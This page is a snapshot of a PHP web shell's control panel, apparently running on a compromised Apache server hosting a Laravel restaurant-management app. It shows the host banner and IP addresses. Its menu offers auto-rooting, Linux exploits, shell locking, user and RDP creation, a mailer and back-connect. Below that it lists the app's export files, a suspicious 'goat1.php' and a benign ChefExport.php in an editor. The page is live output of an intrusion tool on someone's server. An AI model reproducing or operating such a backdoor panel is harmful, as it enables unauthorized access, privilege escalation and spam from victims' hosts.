Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
app /
Exports /
[ HOME SHELL ]
Name
Size
Permission
Action
AdministratorExport.php
1.36
KB
-rwxrwxr-x
ChefExport.php
1.17
KB
-rwxrwxr-x
CreditBalanceReportExport.php
1.26
KB
-rwxrwxr-x
CustomerExport.php
1.26
KB
-rwxrwxr-x
DiningTableExport.php
1.17
KB
-rwxrwxr-x
EmployeeExport.php
1.34
KB
-rwxrwxr-x
ItemCategoryExport.php
1.2
KB
-rwxrwxr-x
ItemExport.php
1.63
KB
-rwxrwxr-x
ItemsReportExport.php
1.47
KB
-rwxrwxr-x
OfferExport.php
1.31
KB
-rwxrwxr-x
OrderExport.php
1.56
KB
-rwxrwxr-x
SalesReportExport.php
1.91
KB
-rwxrwxr-x
TransactionExport.php
1.51
KB
-rwxrwxr-x
WaiterExport.php
1.2
KB
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ChefExport.php
<?php namespace App\Exports; use App\Services\ChefService; use App\Http\Requests\PaginateRequest; use Maatwebsite\Excel\Concerns\WithHeadings; use Maatwebsite\Excel\Concerns\FromCollection; class ChefExport implements FromCollection, WithHeadings { public ChefService $chefService; public PaginateRequest $request; public function __construct(ChefService $chefService, $request) { $this->chefService = $chefService; $this->request = $request; } public function collection(): \Illuminate\Support\Collection { $waiterArray = []; $chefs = $this->chefService->list($this->request); foreach ($chefs as $chef) { $waiterArray[] = [ $chef->name, $chef->email, $chef->country_code . '' . $chef->phone, trans('statuse.' . $chef->status), ]; } return collect($waiterArray); } public function headings(): array { return [ trans('all.label.name'), trans('all.label.email'), trans('all.label.phone'), trans('all.label.status') ]; } }
Close